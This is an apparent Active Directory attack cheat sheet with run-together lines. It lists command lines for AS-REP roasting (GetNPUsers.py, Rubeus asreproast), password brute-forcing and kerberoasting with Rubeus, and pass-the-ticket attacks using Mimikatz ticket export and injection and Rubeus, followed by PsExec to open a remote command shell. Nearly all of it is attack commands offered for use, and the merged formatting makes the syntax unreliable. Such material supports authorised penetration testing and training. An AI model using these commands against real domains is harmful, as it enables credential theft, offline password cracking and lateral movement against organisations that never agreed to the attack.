# ASREP check on all domain Users (Requires valid domain credentials)python2 GetNPUsers.py <Domain>/<User>:<Password>-request -dc-ip <IP>-format<John|Hashcat>| grep "$krb5asrep$"# ASREP check on a list of domain user (Does not require domain credentials)python2 GetNPUsers.py <Domain>-usersfile <UserList>-dc-ip <IP>-format<John|Hashcat>| grep "$krb5asrep$"
Rubeus
# Extract from all domain accounts.\Rubeus.exe asreproast.\Rubeus.exe asreproast /format:hashcat /outfile:C:Hashes.txt
# with a list of users.\Rubeus.exe brute /users:<UserList> /passwords:<Wordlist> /domain:<Domain># Check all domain users again password list.\Rubeus.exe brute /passwords:<Wordlist>
# Kerberoast all users in Domain.\Rubeus kerberoast# All Users in OU.\Rubeus.exe kerberoast /ou:OU=Service_Accounts,DC=Security,DC=local# Specific users.\Rubeus.exe kerberoast /user:File_SVC
Pass-The-Ticket
Mimikatz
# Collect ticketssekurlsa::tickets /export# Inject ticketkerberos::ptt <.kirbi file># spawn CMD with the injected ticketmisc::cmd
Rubeus
# Collect tickets.\Rubeus.exe dump# Inject ticket.\Rubeus.exe ptt /ticket:<.kirbi file>
PsExec
# To be used after injecting ticket with either Rubeus or Mimikatz.\PsExec.exe -accepteula \\<IP> cmd